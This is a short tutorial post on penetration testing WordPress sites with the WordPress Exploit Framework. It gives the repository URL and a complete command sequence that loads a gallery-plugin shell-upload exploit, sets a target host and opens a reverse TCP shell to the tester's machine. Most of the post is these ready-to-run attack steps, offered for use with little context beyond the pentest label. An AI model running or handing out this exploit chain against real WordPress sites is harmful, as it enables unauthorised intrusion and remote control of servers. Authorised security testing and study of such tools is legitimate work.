Penetration Testing in WordPress Website using WordPress Exploit Framework

Datetime:2016-08-23 01:08:58          Topic: Penetration Testing           Share

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems

first clone WPXF repository from github, to do so type:

https://github.com/rastating/wordpress-exploit-framework.git

now Open kali linux terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running  ruby wpxf.rb .

Once loaded, you’ll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

wpxf > use exploit/refelex_gallery_shell_upload

wpxf [ exploit/ refelex_gallery_shell_upload ] > set host 192.168.0.104

wpxf [ exploit/ refelex_gallery_shell_upload ] > set target_uri /

wpxf [ exploit/ refelex_gallery_shell_upload ] > set payload reverse_tcp

wpxf [ exploit/ refelex_gallery_shell_upload ] > set lhost 192.168.0.105

wpxf [ exploit/ refelex_gallery_shell_upload ] > run





About List